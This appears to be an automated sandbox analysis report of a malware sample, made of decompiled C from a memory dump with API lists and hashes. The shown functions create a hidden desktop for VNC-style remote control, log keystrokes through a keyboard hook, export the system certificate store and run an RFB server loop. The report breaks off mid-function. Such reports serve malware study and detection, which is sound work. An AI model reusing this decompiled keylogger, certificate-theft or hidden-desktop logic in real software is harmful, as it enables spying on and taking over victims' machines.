    0x00404b04
    0x00404b04
    0x00404b0c
    0x00404b32
    0x00404b32
    0x00404b39
    0x00404b82
    0x00404b88
    0x00404b8a
    0x00404b90
    0x00404cab
    0x00404cb0
    0x00404cb8
    0x00404cbe
    0x00404cbe
    0x00404cc4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404b96
    0x00404b96
    0x00404b96
    0x00404b9b
    0x00404b9e
    0x00404ba0
    0x00000000
    0x00000000
    0x00404ba2
    0x00404ba8
    0x00000000
    0x00000000
    0x00404bb3
    0x00404bb9
    0x00404bbb
    0x00000000
    0x00000000
    0x00404bce
    0x00404bd4
    0x00404bea
    0x00404bef
    0x00404bf5
    0x00404c01
    0x00404c09
    0x00404c0b
    0x00404c24
    0x00404c31
    0x00404c36
    0x00404c48
    0x00404c4e
    0x00404c60
    0x00404c65
    0x00404c67
    0x00404c71
    0x00404c81
    0x00404c86
    0x00404c91
    0x00404c91
    0x00404ca1
    0x00404ca7
    0x00404ca9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404ca9
    0x00404c0d
    0x00404c10
    0x00000000
    0x00000000
    0x00404c12
    0x00404c12
    0x00404c13
    0x00404c13
    0x00000000
    0x00404c1f
    0x00404b4c
    0x00404b52
    0x00404b5d
    0x00404b63
    0x00404b65
    0x00000000
    0x00000000
    0x00404b6b
    0x00404b6d
    0x00404b73
    0x00000000
    0x00404b73
    0x00404b0e
    0x00404b15
    0x00000000
    0x00000000
    0x00404b1b
    0x00404b23
    0x00000000
    0x00000000
    0x00404b25
    0x00404b2c
    0x00000000
    0x00000000
    0x00000000
    0x00404cc6
    0x00404cd0
    0x00404cd6
    0x00404cd6
    0x00404cde
    0x00404ce1
    0x00000000
    0x00404ce7
    0x00000000

    APIs
    • PathCombineW.SHLWAPI(?,?,00401058), ref: 00404AD0
    • FindFirstFileW.KERNEL32(?,?,?,00401058), ref: 00404AED
    • PathCombineW.SHLWAPI(?,?,0000002E,?,00401058), ref: 00404B4C
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00401058), ref: 00404B5D
    • FindNextFileW.KERNEL32(?,00000010,?,00401058), ref: 00404CD0
    • FindClose.KERNEL32(?,?,00401058), ref: 00404CE1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
    • String ID: .$.
    • API String ID: 3352328711-3769392785
    • Opcode ID: f0fb2e9946f374d9c4e502f8f79d40438c2b7deff6db05dfbaf0ab1d717ee486
    • Instruction ID: 5a58263af4c99b7f8740b288311b6de61e28b98ab436e4f764653bde3f56e9fc
    • Opcode Fuzzy Hash: f0fb2e9946f374d9c4e502f8f79d40438c2b7deff6db05dfbaf0ab1d717ee486
    • Instruction Fuzzy Hash: B7513CB1905118EFDF20DFA0DD48AEA77B8FB44304F0680B6A709B21A0D7359E85DF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414119(void* __ecx) {
    				struct HWINSTA__* _v4;
    				struct HWINSTA__* _v8;
    				char _v9;
    				struct HWINSTA__* _t13;
    				int _t24;
    				struct HWINSTA__* _t26;
    				void* _t28;
    				WCHAR* _t29;
    				struct HDESK__* _t30;
    				WCHAR* _t33;
    
    				_t28 = __ecx;
    				_t29 = L"Winsta0";
    				_v9 = 0;
    				_t13 = OpenWindowStationW(_t29, 0, 0x10000000);
    				_v8 = _t13;
    				if(_t13 != 0) {
    					L2:
    					_v4 = GetProcessWindowStation();
    					if(E004140EE(_t36, _v8) == 0) {
    						L12:
    						CloseWindowStation(_v8);
    						L13:
    						return _v9;
    					}
    					_t33 = L"SubCallssEdit7792";
    					_t30 = OpenDesktopW(_t33, 0, 0, 0x10000000);
    					if(_t30 != 0) {
    						L5:
    						if(E004140A9(_t28, _t39, GetThreadDesktop(GetCurrentThreadId()), _t30) != 0) {
    							L7:
    							_v9 = 1;
    							L8:
    							CloseDesktop(_t30);
    							if(_v9 != 0) {
    								L11:
    								goto L12;
    							}
    							L9:
    							_t43 = _v4;
    							if(_v4 != 0) {
    								E004140EE(_t43, _v4);
    							}
    							goto L11;
    						}
    						_t24 = SetThreadDesktop(_t30);
    						_v9 = 0;
    						if(_t24 == 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					_t30 = CreateDesktopW(_t33, 0, 0, 0, 0x10000000, 0);
    					_t39 = _t30;
    					if(_t30 == 0) {
    						goto L9;
    					}
    					goto L5;
    				}
    				_t26 = CreateWindowStationW(_t29, 0, 0x10000000, 0);
    				_v8 = _t26;
    				_t36 = _t26;
    				if(_t26 == 0) {
    					goto L13;
    				}
    				goto L2;
    			}

    0x00414119
    0x00414128
    0x0041412e
    0x00414132
    0x00414138
    0x0041413e
    0x00414156
    0x00414160
    0x0041416b
    0x004141de
    0x004141e2
    0x004141e8
    0x004141f2
    0x004141f2
    0x00414171
    0x0041417d
    0x00414181
    0x00414195
    0x004141ab
    0x004141bc
    0x004141bc
    0x004141c1
    0x004141c2
    0x004141cc
    0x004141dd
    0x00000000
    0x004141dd
    0x004141ce
    0x004141ce
    0x004141d2
    0x004141d8
    0x004141d8
    0x00000000
    0x004141d2
    0x004141ae
    0x004141b4
    0x004141ba
    0x00000000
    0x00000000
    0x00000000
    0x004141ba
    0x0041418f
    0x00414191
    0x00414193
    0x00000000
    0x00000000
    0x00000000
    0x00414193
    0x00414144
    0x0041414a
    0x0041414e
    0x00414150
    0x00000000
    0x00000000
    0x00000000

    APIs
    • OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
    • CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
    • GetProcessWindowStation.USER32 ref: 00414156
    • OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
    • CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
    • GetCurrentThreadId.KERNEL32 ref: 00414195
    • GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
    • SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
    • CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
    • CloseWindowStation.USER32(?,?), ref: 004141E2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID: SubCallssEdit7792$Winsta0
    • API String ID: 2917431391-621385978
    • Opcode ID: eada033a65eeb81be7a4a19a39a3bc5a04379480b90f90b648bdd5b11bf0ca9f
    • Instruction ID: 4c7fca7ea3063e772fec9fcd2628e766ecc841b5ad94ddd77b17109714ed9629
    • Opcode Fuzzy Hash: eada033a65eeb81be7a4a19a39a3bc5a04379480b90f90b648bdd5b11bf0ca9f
    • Instruction Fuzzy Hash: 6B21B0B5008365BFD710AF61AC8C9EB7FACEAD5394F05483EF945D2211D7298CC8C66A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004060AA(void* __edx, int _a4) {
    				char _v520;
    				short _v524;
    				char _v780;
    				short _v782;
    				short _v784;
    				char _v785;
    				void* __edi;
    				void* __esi;
    				int _t23;
    				intOrPtr _t35;
    				long _t39;
    				intOrPtr _t40;
    				void* _t50;
    				void* _t51;
    				void* _t56;
    				intOrPtr* _t60;
    				intOrPtr _t67;
    
    				_t51 = __edx;
    				_t23 = _a4;
    				if(_t23 == 0) {
    					L15:
    					return _t23;
    				}
    				_t23 =  *(_t23 + 4);
    				if(_t23 != 0x201) {
    					if(_t23 != 0x100) {
    						goto L15;
    					}
    					_t23 = GetKeyState(0x11);
    					if((0x80000000 & _t23) != 0) {
    						goto L15;
    					}
    					_t23 = GetKeyState(0x12);
    					if((0x80000000 & _t23) != 0) {
    						goto L15;
    					}
    					L10:
    					_v782 = 0;
    					_t23 = GetKeyboardState( &_v780);
    					if(_t23 != 0) {
    						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0);
    						if(_t23 == 1) {
    							_v785 = 0;
    							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
    							if(_t23 != 0 && _v785 != 0) {
    								_t23 = E00405E57(_t50, 1,  &_v785);
    							}
    						}
    					}
    					goto L15;
    				}
    				_t67 =  *0x4167bc; // 0x0
    				if(_t67 == 0) {
    					goto L15;
    				} else {
    					 *0x4167bc =  *0x4167bc + 0xffff;
    					_t35 =  *0x416c34; // 0x25df5a8
    					_t3 = _t35 + 0x70; // 0x25dfc30
    					_t60 = E0040970D( *_t3, 0x1e, 0x1f4);
    					if(_t60 != 0) {
    						_t39 = GetCurrentProcessId();
    						_t40 =  *0x416c34; // 0x25df5a8
    						_t4 = _t40 + 0x74; // 0x25dfc80
    						wnsprintfW( &_v524, 0x103,  *_t4, _t56, _t39);
    						E004153A7(_t51, _t60,  &_v520);
    						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
    					}
    					goto L10;
    				}
    			}

    0x004060aa
    0x004060b0
    0x004060c0
    0x004061e7
    0x004061ed
    0x004061ed
    0x004060c6
    0x004060ce
    0x0040615e
    0x00000000
    0x00000000
    0x0040616c
    0x00406174
    0x00000000
    0x00000000
    0x0040617e
    0x00406181
    0x00000000
    0x00000000
    0x00406183
    0x00406185
    0x0040618f
    0x00406197
    0x004061af
    0x004061b7
    0x004061c9
    0x004061cd
    0x004061d5
    0x004061e2
    0x004061e2
    0x004061d5
    0x004061b7
    0x00000000
    0x00406197
    0x004060d4
    0x004060db
    0x00000000
    0x004060e1
    0x004060e6
    0x004060ed
    0x004060f9
    0x00406101
    0x00406105
    0x0040611e
    0x00406125
    0x0040612b
    0x0040613b
    0x0040614c
    0x00406154
    0x00406154
    0x00000000
    0x00406105

    APIs
    • GetTickCount.KERNEL32 ref: 00406117
    • GetCurrentProcessId.KERNEL32(00000000), ref: 0040611E
    • wnsprintfW.SHLWAPI ref: 0040613B
    • GetKeyState.USER32(00000011), ref: 00406166
    • GetKeyState.USER32(00000012), ref: 00406178
    • GetKeyboardState.USER32(?), ref: 0040618F
    • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 004061AF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004061CD
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCC1), ref: 00409724
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD29), ref: 00409738
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD49), ref: 0040974D
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD69), ref: 00409762
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD99), ref: 00409777
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFDB9), ref: 0040978C
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFDE1), ref: 004097A1
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE09), ref: 004097B6
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCE1), ref: 00409812
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE31), ref: 00409826
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCF9), ref: 0040984A
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE59), ref: 0040985E
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE71), ref: 00409872
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE91), ref: 00409887
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFEB1), ref: 0040989C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
    • String ID: unknown
    • API String ID: 1117135736-2904991687
    • Opcode ID: 943b02debf0b438876f0d9b73d99ab2c84af05d422f59886fe2bf6da88f84d70
    • Instruction ID: a70076e158f80f632a33c0edab9cf678fa5ba9942d495cf88427a9bce3a66e24
    • Opcode Fuzzy Hash: 943b02debf0b438876f0d9b73d99ab2c84af05d422f59886fe2bf6da88f84d70
    • Instruction Fuzzy Hash: 2D31C0B6504204AFD720DBA4DC88EDB76ECEB44344F06843AF945EB1D1DA34DD54CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C174(WCHAR* __ecx, intOrPtr __edx) {
    				short _v524;
    				short _v532;
    				char _v540;
    				short _v1076;
    				short _v1078;
    				struct _WIN32_FIND_DATAW _v1124;
    				struct _WIN32_FIND_DATAW _v1132;
    				intOrPtr _v1136;
    				intOrPtr _v1140;
    				void* _t29;
    				signed char _t46;
    				void* _t52;
    				WCHAR* _t55;
    
    				_t55 = __ecx;
    				_v1132.ftLastAccessTime = __edx;
    				PathCombineW( &_v524, __ecx, "*");
    				_t29 = FindFirstFileW( &_v532,  &_v1124);
    				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
    				_t52 = _t29;
    				if(_t52 == 0xffffffff) {
    					L13:
    					return _v1132.dwFileAttributes;
    				} else {
    					goto L1;
    				}
    				L11:
    				if(FindNextFileW(_t52,  &_v1132) != 0) {
    					L1:
    					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
    						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
    						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
    							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
    							if(_t46 == 0) {
    								if(E0040FFBF( &_v540) != 0) {
    									_v1140 = _v1140 + 1;
    								}
    							} else {
    								_v1140 = _v1140 + E0040C174( &_v540, _v1136);
    							}
    						}
    					}
    					goto L11;
    				} else {
    					FindClose(_t52);
    					goto L13;
    				}
    			}

    0x0040c188
    0x0040c193
    0x0040c197
    0x0040c1aa
    0x0040c1b0
    0x0040c1b5
    0x0040c1ba
    0x0040c25d
    0x0040c267
    0x00000000
    0x00000000
    0x00000000
    0x0040c242
    0x0040c250
    0x0040c1c0
    0x0040c1c6
    0x0040c1e7
    0x0040c1ea
    0x0040c20d
    0x0040c215
    0x0040c23c
    0x0040c23e
    0x0040c23e
    0x0040c217
    0x0040c227
    0x0040c227
    0x0040c215
    0x0040c1ea
    0x00000000
    0x0040c256
    0x0040c257
    0x00000000
    0x0040c257

    APIs
    • PathCombineW.SHLWAPI(?,?,00401058,00000000,00000000,00000000), ref: 0040C197
    • FindFirstFileW.KERNEL32(?,?), ref: 0040C1AA
    • PathMatchSpecW.SHLWAPI(?,?), ref: 0040C1F5
    • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040C20D
    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040C248
    • FindClose.KERNEL32(00000000), ref: 0040C257
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
    • String ID: .$.
    • API String ID: 1774936002-3769392785
    • Opcode ID: 17d0d668bd43f15d0942433c1c4f20a7f6459bd4401d4afc836eea5509083f13
    • Instruction ID: c19d3756bbcbc88bfd1e6ba7706cb2c314dc5b7d7743eb1636141c5baddb32bd
    • Opcode Fuzzy Hash: 17d0d668bd43f15d0942433c1c4f20a7f6459bd4401d4afc836eea5509083f13
    • Instruction Fuzzy Hash: 38219E31908345DBC720DBA4D888AAB77F8FB85314F000A3EF58492190E779C949CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00404707
    • PFXExportCertStore.CRYPT32(00000000,025641B0,025641B0,00000004), ref: 00404732
    • PFXExportCertStore.CRYPT32(00000000,025641B0,025641B0,00000004), ref: 00404782
    • GetSystemTime.KERNEL32(?), ref: 00404795
    • wnsprintfW.SHLWAPI ref: 004047C2
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004047F6
    • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 00404801
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00404809
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 00404820
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Cert$Store$ExportSystem$CertificateCertificatesCloseContextDeleteDuplicateEnumFromOpenTimewnsprintf
    • String ID:
    • API String ID: 2462860939-0
    • Opcode ID: 0b38d4166c97423a5f8d304d28608425d6747f86a0d6dcf0ae88f4484c92d8ac
    • Instruction ID: 3bb6bd61e5332bae3517bf3bffe6a22f210b930fe47bed81f05d1308c4b1929b
    • Opcode Fuzzy Hash: 0b38d4166c97423a5f8d304d28608425d6747f86a0d6dcf0ae88f4484c92d8ac
    • Instruction Fuzzy Hash: B5316071504345AFC720EF65ED48DABBBECEBC4710F01883AFA54A21A1D775C904CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00413758(void* __eflags, char _a4, int* _a8, signed int _a12, signed int _a15) {
    				signed char _v9;
    				int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v33;
    				intOrPtr _v35;
    				signed int _v36;
    				char _v40;
    				short _v45;
    				short _v47;
    				char _v48;
    				char _v53;
    				char _v56;
    				char _v57;
    				char _v60;
    				char _v64;
    				signed int _v68;
    				unsigned int _v73;
    				signed int _v76;
    				signed int _v80;
    				char _v93;
    				char _v94;
    				unsigned int _v96;
    				signed int _v100;
    				char _v116;
    				signed short _v118;
    				signed short _v120;
    				char _v124;
    				char _v132;
    				char _v392;
    				char _v648;
    				void* __esi;
    				int _t244;
    				void* _t246;
    				signed char _t250;
    				unsigned int _t258;
    				signed int _t263;
    				int _t270;
    				signed int _t292;
    				signed int _t296;
    				signed int _t297;
    				void* _t299;
    				signed int _t300;
    				void* _t304;
    				void* _t313;
    				signed int _t320;
    				signed int _t321;
    				void* _t323;
    				signed int _t324;
    				signed short _t326;
    				unsigned int _t327;
    				signed int _t330;
    				signed int _t332;
    				signed int _t334;
    				intOrPtr _t336;
    				signed int _t340;
    				void* _t342;
    				signed int _t343;
    				signed int _t349;
    				signed int _t351;
    				signed int _t352;
    				void* _t354;
    				signed int _t355;
    				signed int _t360;
    				signed int* _t361;
    				signed short _t363;
    				signed int _t366;
    				signed int* _t368;
    				signed int _t369;
    				void* _t371;
    				signed int _t372;
    				signed int _t373;
    				signed char _t376;
    				signed char _t378;
    				signed char _t380;
    				signed int _t389;
    				signed int _t398;
    				void* _t407;
    				signed int _t408;
    				void* _t410;
    				signed int _t411;
    				signed int _t421;
    				int _t426;
    				signed int _t432;
    				signed int _t436;
    				signed int _t443;
    				signed int _t444;
    				int _t472;
    				unsigned int _t474;
    				signed char _t480;
    				signed int _t482;
    				signed char _t484;
    				intOrPtr _t495;
    				void* _t496;
    				signed int _t503;
    				signed int _t515;
    				signed int _t517;
    				signed int _t525;
    				signed int _t526;
    				int* _t533;
    				signed int _t544;
    				intOrPtr* _t553;
    				void* _t554;
    				signed int _t556;
    				signed int _t557;
    				signed int _t558;
    				void* _t560;
    
    				_t533 = _a8;
    				_t244 = E0041059E(_a4, "RFB 003.003\n", 0xc);
    				if(_t244 == 0) {
    					L124:
    					return _t244;
    				}
    				_push(0x1b7740);
    				_push( &_v64);
    				_push(_a4);
    				_t246 = 0xc;
    				_t244 = E0041053D(_t246);
    				if(_t244 == 0) {
    					goto L124;
    				}
    				_push( &_v64);
    				_t496 = 4;
    				_t244 = E0040F547(_t496, "RFB ", _t496);
    				if(_t244 != 0) {
    					goto L124;
    				}
    				_v57 = 0;
    				_v53 = 0;
    				_t250 = E0040F2EB( &_v56, "RFB ");
    				_t244 = ((E0040F2EB( &_v60, "RFB ") & 0x000000ff | (_t250 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t244 > 0x300) {
    					goto L124;
    				} else {
    					_v24 = 1;
    					_v40 = 0;
    					_t533[1]( &_v40);
    					_t258 = _v24;
    					_t503 = (_t258 & 0x0000ff00 | _t258 << 0x00000010) << 8;
    					_t452 = (_t258 & 0x00ff0000 | _t258 >> 0x00000010) >> 0x00000008 | _t503;
    					_v28 = (_t258 & 0x00ff0000 | _t258 >> 0x00000010) >> 0x00000008 | _t503;
    					if(E0041059E(_a4,  &_v28, 4) == 0) {
    						_v24 = _v24 | 0xffffffff;
    					}
    					_t263 = _v24;
    					if(_t263 == 0) {
    						return E004136F2(_t452, __eflags, _a4, _v40);
    					}
    					_t244 = _t263 - 1;
    					if(_t244 != 0) {
    						goto L124;
    					}
    					_t244 = E0041053D(1, _a4,  &_v9, 0x1b7740);
    					if(_t244 == 0) {
    						goto L124;
    					}
    					_t244 = _t533[2]();
    					if(_t244 == 0) {
    						goto L124;
    					}
    					_v40 = 0;
    					_t244 = _t533[3]( &_v132);
    					_t455 = _t244;
    					_t573 = _t244;
    					if(_t244 == 0) {
    						goto L124;
    					}
    					_t244 = E00413521( &_v132, _t455,  &_v40, _t573, _a12);
    					_v16 = _t244;
    					if(_t244 == 0) {
    						goto L124;
    					}
    					_t544 = E0040F521(_v40);
    					_t270 = _v16;
    					_v120 =  *(_t270 + 4) << 0x00000008 |  *(_t270 + 5) & 0x000000ff;
    					_v118 =  *(_t270 + 6) << 0x00000008 |  *(_t270 + 7) & 0x000000ff;
    					_v100 = (_t544 & 0x00ff0000 | _t544 >> 0x00000010) >> 0x00000008 | (_t544 << 0x00000010 | _t544 & 0x0000ff00) << 0x00000008;
    					E0040F0FC( &_v116, _v16 + 0x20, 0x10);
    					asm("rol word [ebp-0x6c], 0x8");
    					asm("rol word [ebp-0x6a], 0x8");
    					asm("rol word [ebp-0x68], 0x8");
    					if(E0041059E(_a4,  &_v120, 0x18) == 0 || _t544 > 0 && E0041059E(_a4, _v40, _t544) == 0) {
    						return E004136BC(_v16);
    					} else {
    						_t469 = 0xffff;
    						_v45 = 0xffff;
    						_v48 = 0;
    						_v47 = 0xffff;
    						E0040F173( &_v648,  &_v648, 0, 0xff);
    						E0040F173( &_v392,  &_v392, 0, 0xff);
    						_v20 = 0;
    						_v24 = 0;
    						L16:
    						while(_v20 <= 0 || E0041080E(0,  &_a4, 0x12c, 0) != 0xffffffff) {
    							_t292 = E0041053D(1, _a4,  &_v9, 0x1b7740);
    							__eflags = _t292;
    							if(_t292 == 0) {
    								L121:
    								E004136BC(_v16);
    								return E0040F0C0(_v24);
    							}
    							_t296 = _v9 & 0x000000ff;
    							__eflags = _t296;
    							if(_t296 == 0) {
    								_t297 = E0041056F(_t469, _a4, 3, 0x1b7740);
    								__eflags = _t297;
    								if(_t297 == 0) {
    									goto L121;
    								}
    								_push(0x1b7740);
    								_push( &_v96);
    								_push(_a4);
    								_t299 = 0x10;
    								_t300 = E0041053D(_t299);
    								__eflags = _t300;
    								if(_t300 == 0) {
    									goto L121;
    								}
    								__eflags = _v96 - 0x20;
    								if(_v96 == 0x20) {
    									L118:
    									__eflags = _v93;
    									if(_v93 == 0) {
    										goto L121;
    									}
    									asm("rol word [ebp-0x58], 0x8");
    									asm("rol word [ebp-0x56], 0x8");
    									asm("rol word [ebp-0x54], 0x8");
    									__eflags = _v94;
    									_v94 = _t300 & 0xffffff00 | _v94 != 0x00000000;
    									_t235 = _v16 + 0x31; // 0x31
    									_v93 = 1;
    									_t304 = E0040F0FC(_t235,  &_v96, 0x10);
    									_t469 = _v96 >> 3;
    									 *(_t304 + 0x41) = _v96 >> 3;
    									continue;
    								}
    								__eflags = _v96 - 0x10;
    								if(_v96 == 0x10) {
    									goto L118;
    								}
    								__eflags = _v96 - 8;
    								if(_v96 != 8) {
    									goto L121;
    								}
    								goto L118;
    							}
    							_t320 = _t296;
    							__eflags = _t320;
    							if(_t320 == 0) {
    								_t321 = E0041056F(_t469, _a4, 1, 0x1b7740);
    								__eflags = _t321;
    								if(_t321 == 0) {
    									goto L121;
    								}
    								_push(0x1b7740);
    								_push( &_v80);
    								_push(_a4);
    								_t323 = 2;
    								_t324 = E0041053D(_t323);
    								__eflags = _t324;
    								if(_t324 == 0) {
    									goto L121;
    								}
    								_t472 = _v16;
    								 *(_t472 + 0x4c) =  *(_t472 + 0x4c) & 0x00000000;
    								asm("rol ax, 0x8");
    								_t326 = _v80 & 0x0000ffff;
    								 *(_t472 + 0x48) = _t326;
    								__eflags = _t326;
    								if(_t326 <= 0) {
    									L107:
    									_t426 = _t472;
    									L108:
    									_t327 =  *(_t426 + 0x4c);
    									_t469 =  *(_t426 + 0x4f) & 0x000000ff;
    									_t515 = (_t327 << 0x00000010 | _t327 & 0x0000ff00) << 0x00000008 | _t327 >> 0x00000008 & 0x0000ff00 |  *(_t426 + 0x4f) & 0x000000ff;
    									 *(_t426 + 0x50) = _t515;
    									__eflags = _t327 - 5;
    									if(_t327 != 5) {
    										E0040F0C0( *(_t426 + 0x1c));
    										 *(_t426 + 0x1c) =  *(_t426 + 0x1c) & 0x00000000;
    										continue;
    									}
    									__eflags =  *(_t426 + 0x1c);
    									if( *(_t426 + 0x1c) != 0) {
    										continue;
    									}
    									_t330 = E0040F0A8(0x400);
    									_t469 = _v16;
    									 *(_v16 + 0x1c) = _t330;
    									__eflags = _t330;
    									if(_t330 != 0) {
    										continue;
    									}
    									goto L121;
    								}
    								_t428 = (_t326 & 0x0000ffff) << 2;
    								_t553 = _t472 + 0x44;
    								_t332 = E0040F053((_t326 & 0x0000ffff) << 2, _t553);
    								__eflags = _t332;
    								if(_t332 == 0) {
    									goto L121;
    								}
    								_t334 = E0041053D(_t428, _a4,  *_t553, 0x1b7740);
    								__eflags = _t334;
    								if(_t334 == 0) {
    									goto L121;
    								}
    								_t426 = _v16;
    								_a12 = _a12 & 0x00000000;
    								__eflags = 0 -  *((intOrPtr*)(_t426 + 0x48));
    								if(0 >=  *((intOrPtr*)(_t426 + 0x48))) {
    									goto L108;
    								}
    								_t336 =  *_t553;
    								do {
    									_t517 = (_a12 & 0x0000ffff) << 2;
    									 *(_t517 + _t336) = ( *(_t517 + _t336) << 0x00000010 |  *(_t517 + _t336) & 0x0000ff00) << 0x00000008 |  *(_t494 + 3) & 0x000000ff |  *(_t517 + _t336) >> 0x00000008 & 0x0000ff00;
    									_t336 =  *_t553;
    									_t495 = 5;
    									__eflags =  *(_t517 + _t336) - _t495;
    									if( *(_t517 + _t336) == _t495) {
    										 *((intOrPtr*)(_v16 + 0x4c)) = _t495;
    									}
    									_a12 = _a12 + 1;
    									_t472 = _v16;
    									__eflags = _a12 -  *(_t472 + 0x48);
    								} while (_a12 <  *(_t472 + 0x48));
    								_t533 = _a8;
    								goto L107;
    							}
    							_t340 = _t320 - 1;
    							__eflags = _t340;
    							if(_t340 == 0) {
    								_push(0x1b7740);
    								_push( &_v60);
    								_push(_a4);
    								_t342 = 9;
    								_t343 = E0041053D(_t342);
    								__eflags = _t343;
    								if(_t343 == 0) {
    									goto L121;
    								}
    								asm("rol word [ebp-0x37], 0x8");
    								asm("rol word [ebp-0x35], 0x8");
    								asm("rol word [ebp-0x33], 0x8");
    								asm("rol word [ebp-0x31], 0x8");
    								__eflags = _v60;
    								_t469 = 0;
    								_t432 = 0;
    								_v60 = _t343 & 0xffffff00 | _v60 != 0x00000000;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L93:
    									__eflags = _t432 - _v20;
    									if(_t432 != _v20) {
    										L95:
    										E0040F0FC(_t432 * 9 + _v24,  &_v60, 9);
    										continue;
    									}
    									_v20 = _v20 + 1;
    									_t349 = E0040F053(_v20 * 9,  &_v24);
    									__eflags = _t349;
    									if(_t349 == 0) {
    										goto L121;
    									}
    									goto L95;
    								}
    								_t351 = _v24 + 7;
    								__eflags = _t351;
    								do {
    									__eflags =  *((intOrPtr*)(_t351 - 2)) - _t469;
    									if( *((intOrPtr*)(_t351 - 2)) != _t469) {
    										goto L92;
    									}
    									__eflags =  *_t351 - _t469;
    									if( *_t351 == _t469) {
    										goto L93;
    									}
    									L92:
    									_t432 = _t432 + 1;
    									_t351 = _t351 + 9;
    									__eflags = _t432 - _v20;
    								} while (_t432 < _v20);
    								goto L93;
    							}
    							_t352 = _t340 - 1;
    							__eflags = _t352;
    							if(_t352 == 0) {
    								_push(0x1b7740);
    								_push( &_v76);
    								_push(_a4);
    								_t354 = 7;
    								_t355 = E0041053D(_t354);
    								__eflags = _t355;
    								if(_t355 == 0) {
    									goto L121;
    								}
    								_t474 = _v73;
    								_t525 = (_t474 << 0x00000010 | _t474 & 0x0000ff00) << 8;
    								_t360 = (_t474 & 0x00ff0000 | _t474 >> 0x00000010) >> 0x00000008 | _t525;
    								__eflags = _v76;
    								_v73 = _t360;
    								_t515 = _t525 & 0xffffff00 | _v76 != 0x00000000;
    								__eflags = _t515;
    								_v76 = _t515;
    								_v28 = (0 | _t515 != 0x00000000) - 0x00000001 & 0xc0000000;
    								_t480 = 0;
    								__eflags = 0;
    								while(1) {
    									_t556 = _t480 & 0x000000ff;
    									__eflags =  *((intOrPtr*)(0x4011c8 + _t556 * 8)) - _t360;
